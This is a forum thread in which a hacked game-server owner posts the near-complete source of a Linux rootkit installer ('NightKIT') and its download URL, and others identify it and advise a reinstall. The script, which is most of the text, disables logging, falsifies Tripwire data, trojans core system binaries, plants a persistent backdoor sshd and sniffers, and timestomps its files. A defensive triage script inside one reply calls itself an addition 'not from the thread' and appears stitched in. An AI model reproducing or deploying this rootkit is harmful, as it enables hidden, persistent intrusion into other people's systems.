ET SERVER BEEN HACKED NEED HELP LOOK OUT


(cwerle@mail.com) #1

Someone hacked my Linux box and downloaded and installed a file from this address. DO NOT CLICK "http://amaz0n.namepass.nt/.%/nk.gz" DO NOT CLICK

This text file was with a bunch of zipped files. Anyone know WTF this [censored] is??? My box is currently shut down and I ran the panic feature to shut down any remote access.

#!/bin/bash

nightkit

by: NightF0X & badc0der

only for their crew — [censored] script kiddos

#vars

PASS=pa55w0rd
PORT=6969
BASEDIR=pwd
SYSLOGCONF="/etc/syslog.conf"
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
MYIPADDR=/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' ' | cut -c6-
BACKUP=/usr/lib/libsh/.backup

#colorz

BLK=‘e[1;30m’
RED=‘e[1;31m’
GRN=‘e[1;32m’
YEL=‘e[1;33m’
BLU=‘e[1;34m’
MAG=‘e[1;35m’
CYN=‘e[1;36m’
WHI=‘e[1;37m’
DRED=‘e[0;31m’
DGRN=‘e[0;32m’
DYEL=‘e[0;33m’
DBLU=‘e[0;34m’
DMAG=‘e[0;35m’
DCYN=‘e[0;36m’
DWHI=‘e[0;37m’
RES=‘e[0m’

unseting some log filezecho “$======================================================$”

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

#test if u r root

if [ “$(whoami)” != “root” ]; then

echo “$u f0rgot to local exploit the b0x…u should be$ r3wt [r00t]$ for th1s$”
echo “”
exit
fi

tar zxf ./bin.tgz
tar zxf ./conf.tgz
tar zxf ./lib.tgz
tar zxf ./utils.tgz
cd ./bin; tar zxf ./sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz conf.tgz lib.tgz utils.tgz
killall -9 syslogd >/dev/null 2>&1
cd $BASEDIR
#print banner

echo -n “$N0w 1nstalling”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1

echo “”
echo “”
echo “$======================================================$”
echo “$”
echo " __ __ __ __ "
echo " / | / / /
/ / / /
/ || //|| ======"
echo " / /||/ / __ ____ / /
/ / ||// || ||"
echo " / / | / / / / / / __ / / / ||\ || ||"
echo " /
/ |
/ /
/ /__ / // // /_/ || \ || ||"
echo " //"
echo " /
/ "
echo “$”
echo " version : 1.1"
echo " date : january/2006"
echo " author : NightF0X"
echo " special_thx : Garret a.k.a. badc0der"
echo “”
echo “$======================================================$”
echo “”
echo “”

sleep 1

#server infos

echo “$ Server informations:”
echo “”
echo " $hostname$ = $hostname -f ($MYIPADDR)"
echo " $kernel$ = $uname -rvo"
echo -n " $distrib $ = $"
if [ -f /etc/redhat-release ]; then
echo -n “head -1 /etc/redhat-release$”
elif [ -f /etc/slackware-version ]; then
echo -n “head -1 /etc/slackware-version$”
elif [ -f /etc/debian_version ]; then
echo -n “head -1 /etc/debian_version$”
elif [ -f /etc/SuSE-release ]; then
echo -n “head -1 /etc/SuSE-release$”
elif [ -f /etc/issue ]; then
echo -n “head -1 /etc/issue$”
else echo -n " unknown$"
fi
echo “”
echo " $uptime$ =$uptime$"
sleep 5

#Verifying the box

echo “”
echo “$ Verifying the b0x:”
echo “”

sleep 1

echo -n " $Checking for remote logging files"
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo “”
echo “”
echo -n “$.”
sleep 1
REMOTE=grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2
echo “”
echo “”
if [ ! -z “$REMOTE” ]; then
echo -n “$ DETECTED$”
echo “”
echo “”
echo “$ WARNING!!! REMOTE LOGGING FOUND $”
echo “$ My suggestion is to pwn the logging computer(s): $”
echo “”
echo “$ The computer(s) logging are: $”
for host in $REMOTE; do
echo -n " "
echo $host
done
echo “”
else
echo -n “$ NOT DETECTED$”
fi
echo “”
echo -n " $Checking for malicios admin tools"
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo""

echo -n “$ Checking for tripwire$”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1

uname=uname -n
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo -n “$ DETECTED$”
echo “”
echo “$ WARNING!!! TRIPWIRE FOUND $”

if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd
echo " $Checking for tripwire database$"
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1

echo -n “$ DETECTED$”
echo “”
echo “$ WARNING!!! TRIPWIRE DATABASE FOUND $”
echo “$ We can fix this hehehe$”
echo “”
echo “-----------------------------------------” >> $twd
echo “Tripwire segment-faulted !” >> $twd
echo “-----------------------------------------” >> $twd
echo “” >> $twd
echo "The reasons for this may be: " >> $twd
echo “” >> $twd
echo “corrupted disc-geometry, possible bad disc-sectors” >> $twd
echo “corrupted files while checking for possible change etc.” >> $twd
echo “”
echo “pls. rerun tripwire to build the database again!” >> $twd
echo “” >> $twd
else
echo -n “$ NOT DETECTED$”
fi
else
echo -n “$ NOT DETECTED$”
fi
echo “”

if [ -f /sbin/xlogin ]; then
chattr -isa /sbin/xlogin
chattr -isa /bin/login
mv -f /sbin/xlogin /bin/login
chmod 7455 /bin/login
chattr +isa /bin/login
fi
echo “”
echo -n “$ 1nstalling tr0jans”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
if [ -f /etc/sh.conf ]; then
chattr -isa /etc/sh.conf
rm -rf /etc/sh.conf
fi

if [ ! -f /lib/libproc.a ]; then
mv lib/libproc.a /lib/
fi

if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv lib/libproc.so.2.0.6 /lib/
fi

/sbin/ldconfig >/dev/null 2>&1

if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi

if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi

if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi
echo “”
if test -n “$1” ; then
echo “$ Using Password : $$1”
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf
else
echo “$ Using Password : $$PASS”
echo -n $PASS|md5sum > /etc/sh.conf
fi

touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf

if test -n “$2” ; then
echo “$ Using Port : $$2”
echo “Port $2” >> $BASEDIR/bin/.sh/sshd_config
echo “3 $2” >> $BASEDIR/conf/hosts.h
echo “4 $2” >> $BASEDIR/conf/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo “$ Using Port : $$PORT”
echo “Port $DEFPORT” >> $BASEDIR/bin/.sh/sshd_config
echo “3 $2” >> $BASEDIR/conf/hosts.h
echo “4 $2” >> $BASEDIR/conf/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
echo “”
echo -n “$ Backd00ring some files”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
if [ -f /lib/lidps1.so ]; then
chattr -isa /lib/lidps1.so
rm -rf /lib/lidps1.so
fi

if [ -f /usr/include/hosts.h ]; then
chattr -isa /usr/include/hosts.h
rm -rf /usr/include/hosts.h
fi

if [ -f /usr/include/file.h ]; then
chattr -isa /usr/include/file.h
rm -rf /usr/include/file.h
fi

if [ -f /usr/include/log.h ]; then
chattr -isa /usr/include/log.h
rm -rf /usr/include/log.h
fi

if [ -f /usr/include/proc.h ]; then
chattr -isa /usr/include/proc.h
rm -rf /usr/include/proc.h
fi

cd $BASEDIR
mv $BASEDIR/conf/lidps1.so /lib/lidps1.so
touch -acmr /bin/ls /lib/lidps1.so
touch -acmr /bin/ls $BASEDIR/conf/*
mv $BASEDIR/conf/* /usr/include/

if [ -d /lib/libsh.so ]; then
chattr -isa /lib/libsh.so
chattr -isa /lib/libsh.so/*
rm -rf /lib/libsh.so
fi

if [ -d /usr/lib/libsh ]; then
chattr -isa /usr/lib/libsh
chattr -isa /usr/lib/libsh/*
rm -rf /usr/lib/libsh/*
fi

mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi

if [ -f /usr/sbin/ttyload ]; then
chattr -isa /usr/sbin/ttyload
rm -rf /usr/sbin/ttyload
fi

if [ -f /sbin/ttymon ]; then
chattr -isa /sbin/ttymon
rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 pidof ttyload >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 pidof ttymon >/dev/null 2>&1

cp /bin/bash $SSHDIR

chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo “# Loading standard ttys” >> /tmp/.init1
echo “0:2345:once:/usr/sbin/ttyload” >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# modem getty.” >> /tmp/.init1
echo “# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem” >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# fax getty (hylafax)” >> /tmp/.init1
echo “# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem” >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# vbox (voice box) getty” >> /tmp/.init1
echo “# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6” >> /tmp/.init1
echo “# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7” >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# end of /etc/inittab” >> /tmp/.init1
echo “/sbin/ttyload -q >/dev/null 2>&1” > /usr/sbin/ttyload
echo “/sbin/ttymon >/dev/null 2>&1” >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1

touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab
rm -rf /tmp/.init2
echo “”

if [ ! “grep ttyload /etc/inittab” ]; then
echo "$ WARNING - SSHD WONT BE RELOADED UPON RESTART "
echo "$ inittab shuffling probably [censored]-up ! "
fi

if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi

if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi

if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi

if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi

if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi

if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi

if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi

if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi

if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi

if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi

if [ ! -f /dev/srd0 ]; then
./encrypt -e .shmd5 /dev/srd0
touch -acmr /bin/ls /dev/srd0
chattr a+r /dev/srd0
chown -f root:root /dev/srd0
fi
rm -rf .shmd5

#time change bitch

touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1

Backdoor ps/top/du/ls/netstat/etc…

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP

ps …

if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps
chattr +isa /usr/bin/ps
fi

if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps
chattr +isa /bin/ps
fi

ifconfig …

chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig

netstat …

if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat
chattr +isa /usr/sbin/netstat
fi

chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat
chattr +isa /bin/netstat

top …

if [ -f /usr/bin/top ]; then
chattr -isa /usr/bin/top
cp /usr/bin/top $BACKUP
mv -f top /usr/bin/top
chattr +isa /usr/bin/top
if [ -f /lib/libncurses.so.5 ]; then
ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi

if [ -f /usr/lib/libncurses.so.5 ]; then
ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
fi

slocate …

if [ -f /usr/bin/slocate ]; then
chattr -isa /usr/bin/slocate
cp /usr/bin/slocate $BACKUP
mv -f slocate /usr/bin/slocate
chattr +isa /usr/bin/slocate
fi

ls …

chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls
chattr +isa /bin/ls

find …

if [ -f /usr/bin/find ]; then
chattr -isa /usr/bin/find
cp /usr/bin/find $BACKUP
mv -f find /usr/bin/find
chattr +isa /usr/bin/find
fi

dir …

if [ -f /usr/bin/dir ]; then
chattr -isa /usr/bin/dir
cp /usr/bin/dir $BACKUP
mv -f dir /usr/bin/dir
chattr +isa /usr/bin/dir
fi

lsof …

if [ -f /usr/sbin/lsof ]; then
chattr -isa /usr/sbin/lsof
cp /usr/sbin/lsof $BACKUP
mv -f lsof /usr/sbin/lsof
chattr +isa /usr/sbin/lsof
fi

pstree …

if [ -f /usr/bin/pstree ]; then
chattr -isa /usr/bin/pstree
cp /usr/bin/pstree $BACKUP
mv -f pstree /usr/bin/pstree
chattr +isa /usr/bin/pstree
fi

md5sum …

chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum

echo “$ ps/ls/top/netstat/ifconfig/find/ and rest backdoored$”
echo “”
echo -n “$ Moving our filez”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”

touch -acmr /bin/ls $BASEDIR/utils
touch -acmr /bin/ls $BASEDIR/utils/*
mv $BASEDIR/utils $HOMEDIR/

mkdir $HOMEDIR/.sniff
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp
mv $BASEDIR/bin/shsb $HOMEDIR/shsb
mv $BASEDIR/bin/hide $HOMEDIR/hide

touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide

chmod +x $HOMEDIR/.sniff/*
chmod +x $HOMEDIR/shsb
chmod +x $HOMEDIR/hide

echo “”
echo “$ the filez where moved to $HOMEDIR$”
echo “”
echo -n “$ Checking for vuln-daemons”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
ps aux > /tmp/.procs

if [ “cat /tmp/.procs | grep named” ]; then
echo “$ NAMED found - patch it$”
fi

if [ -f /usr/sbin/wu.ftpd ]; then
echo “$ WU-FTPD found - patch it$”
fi

if [ “cat /tmp/.procs | grep smbd” ]; then
echo “$ SAMBA found - patch it$”
fi

if [ “cat /tmp/.procs | grep rpc.statd” ]; then
echo “$ RPC.STATD found - patch it$”
fi

rm -rf /tmp/.procs

netstat -natp > /tmp/.stats

if [ “cat /tmp/.stats | grep 443 | grep http” ]; then
echo “$ MOD_SSL found - patch it$”
fi

rm -rf /tmp/.stats
echo “”
echo -n “$ Checking for other rootkits/backdoors”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
mkdir $HOMEDIR/.owned

if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi

if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo “$ tk8 detected and $OWNED$”
fi

if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo “$ tk7 detected and $OWNED$”
fi

if [ -f /usr/sbin/xntpd ]; then
chattr -isa /usr/sbin/xntpd
rm -rf /usr/sbin/xntpd
fi

if [ -d /usr/include/bex ]; then
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
chattr -isa /usr/include/bex
chattr -isa /usr/include/bex/*
mv /usr/include/bex/ $HOMEDIR/.owned/bex2
if [ -f /var/log/tcp.log ]; then
chattr -isa /var/log/tcp.log
cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
fi
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
rm -rf /usr/bin/sshd2 >/dev/null 2>&1
echo “$ beX2 detected and $OWNED$”
fi

if [ -d /dev/tux/ ]; then
chattr -isa /usr/bin/xsf >/dev/null 2>&1
rm -rf /usr/bin/xsf >/dev/null 2>&1
chattr -isa /usr/bin/xchk >/dev/null 2>&1
rm -rf /usr/bin/xchk >/dev/null 2>&1
chattr -isa /dev/tux >/dev/null 2>&1
mv /dev/tux $HOMEDIR/.owned/tuxkit
echo “$ tuxkit detected and $OWNED$”
fi

if [ -f /usr/bin/ssh2d ]; then
chattr -isa /usr/bin/ssh2d
rm -rf /usr/bin/ssh2d
chattr -isa /lib/security/.config/
chattr -isa /lib/security/.config/*
rm -rf /lib/security/.config
echo “$ optickit detected and $OWNED$”
fi

if [ -f /etc/ld.so.hash ]; then
chattr -isa /etc/ld.so.hash
rm -rf /etc/ld.so.hash
fi
echo “”

echo -n “$ Grep’ing stuff from rc.sysinit and inetd.conf”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
echo "$ greped what we needed "

if [ -f /etc/rc.d/rc.sysinit ]; then
chattr -isa /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit | grep -v “# Xntps (NTPv3 daemon) startup…”| grep -v “/usr/sbin/xntps”| grep -v “/usr/sbin/nscd” > /tmp/.grep
chmod +x /tmp/.grep
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
mv -f /tmp/.grep /etc/rc.d/rc.sysinit
rm -rf /tmp/.grep
fi

if [ -f /etc/inetd.conf ]; then
chattr -isa /etc/inetd.conf
cat /etc/inetd.conf | grep -v “6635”| grep -v “9705” > /tmp/.grep
touch -acmr /etc/inted.conf /tmp/.grep
mv -f /tmp/.grep /etc/inetd.conf
rm -rf /tmp/.grep
fi

echo “”

echo -n “$ Killing some daemons”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
echo “$ daemons successfully killed$”

killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1

rm -rf /tmp/info_tmp

echo “”
echo -n “$ ipchains/iptables testing”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”

if [ -f /sbin/ipchains ]; then
echo “$/sbin/ipchains -L input | head -5$”
else
echo “$ ipchains$ NOT FOUND$”
fi

if [ -f /sbin/iptables ]; then
echo “$/sbin/iptables -L input | head -5$”
else
echo “$ iptables$ NOT FOUND$”
fi

echo “”
echo -n “$ Cleaning logs”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”

if [ -f /usr/sbin/syslogd ]; then
/usr/sbin/syslogd -m 0
else
/sbin/syslogd -m 0
fi

if [ -f /usr/sbin/inetd ]; then
killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
killall -HUP xinetd
fi

cd $BASEDIR
rm -rf …/nk*
rm -rf …/nk.tgz
rm -rf …/hat
rm -rf …/own
echo “$ NightKIT installed. ENJOY$”
killall -9 hat
killall -9 own


(jaybird) #2

That's a rootkit installer. What he's doing is attempting to clean his tracks (by cleansing log files, etc.), install a backdoor, and modify crucial system files that hide the backdoor. He didn't do a good job if you found that file.

This is bad, and at this point you really should wipe your server and restart, because chances are you won’t find everything that was done.
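If you want to confirm what the installer touched before wiping, here is an added triage check (not from the thread, not part of the kit) that runs offline against a mounted, read-only copy of the suspect disk. The artifact paths, the replaced binaries and the `ttyload` inittab line are taken from the script posted above; the mtime heuristic is an assumption based on the installer's use of `touch -acmr /bin/ls` on everything it drops.

```shell
#!/bin/sh
# Offline triage for the NightKIT installer posted in this thread.
# Run it against a MOUNTED, READ-ONLY copy of the suspect disk (e.g. /mnt/evidence),
# never on the live box: its ls/find/md5sum may already be trojaned.

# Files and directories the installer creates (paths copied from the script).
NK_FILES="etc/sh.conf sbin/ttyload sbin/ttymon usr/sbin/ttyload lib/libsh.so \
usr/lib/libsh usr/lib/libsh/.backup lib/lidps1.so usr/include/hosts.h \
usr/include/file.h usr/include/log.h usr/include/proc.h dev/srd0 lib/libproc.so.2.0.6"

# System binaries the installer swaps for trojaned copies.
NK_BINS="bin/ps bin/netstat sbin/ifconfig usr/bin/top usr/bin/find usr/bin/dir \
usr/sbin/lsof usr/bin/slocate usr/bin/pstree usr/bin/md5sum"

# nk_scan ROOT: print one line per indicator found under ROOT, then the hit count.
nk_scan() {
  root=${1%/}
  hits=0
  for f in $NK_FILES; do
    if [ -e "$root/$f" ]; then
      echo "ARTIFACT  $root/$f"
      hits=$((hits + 1))
    fi
  done
  # Persistence: the installer rewrites /etc/inittab with a ttyload entry.
  if [ -f "$root/etc/inittab" ] && grep -q ttyload "$root/etc/inittab"; then
    echo "INITTAB   $(grep ttyload "$root/etc/inittab" | head -n 1)"
    hits=$((hits + 1))
  fi
  # Timestomping heuristic (assumption): every dropped binary gets /bin/ls's
  # timestamps, so unrelated tools sharing its exact mtime deserve a look.
  if [ -f "$root/bin/ls" ]; then
    ref=$(stat -c %Y "$root/bin/ls")
    for b in $NK_BINS; do
      if [ -f "$root/$b" ] && [ "$(stat -c %Y "$root/$b")" = "$ref" ]; then
        echo "MTIME     $root/$b has the same mtime as /bin/ls ($ref)"
        hits=$((hits + 1))
      fi
    done
  fi
  echo "$hits"
}
```

Any non-zero count confirms the compromise; it does not prove the absence of anything else, which is why the reinstall advice above still stands.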


(cwerle@mail.com) #3

Any idea how he got access???


(jaybird) #4

That's the million dollar question :)

When you reinstall your operating system, I would avoid installing many network servers (i.e. FTP servers, finger servers, web servers, etc.). For those you have to install, make absolutely sure you're using the latest release-quality versions, as these usually include fixes for all known exploits.

Honestly, unless you were running a packet capture program, there’s probably no way you’ll figure out how he broke in.


(cwerle@mail.com) #5

To be totally honest with you, the only thing I used this Linux box for was to host my clan server and my clan scrim server. So really nothing else was used on it, other than the VNC server embedded in Fedora Core 5. AND NO ONE BUT me had the root password, or the one user password.


(jaybird) #6

Just because that’s all you used doesn’t mean that’s all that was running. And chances are that the cracker didn’t need to know your password - he probably exploited a known weakness in one of your services to get entry.


(SCDS_reyalP) #7

There are several known security issues in various ET versions. None that I know of lead directly to a root compromise, but you ran your server as root (a very bad idea), and that may have been responsible. However, since we don't have any forensic information about your system, there is no way anyone here can tell.

Some known security issues are mentioned here: http://bani.anime.net/banimod/forums/viewtopic.php?t=6512
and here: http://bani.anime.net/banimod/forums/viewtopic.php?t=6777

As Jaybird suggests, your best option is to completely re-install the server, make sure everything is up to date, and run your ET server under an isolated, limited privilege account.


(Ragnar_40k) #8

You could use something like UML and install each server in its own user space. Using UML might eat some server performance, but nowadays servers are fast enough, so this little overhead shouldn’t be a problem.


(jjpron) #9

You can also install a program “DenyHosts” which monitors your ssh login attempts and blacklists those IPs that constantly fail authorization. (After you do a clean install of course.)
Good luck!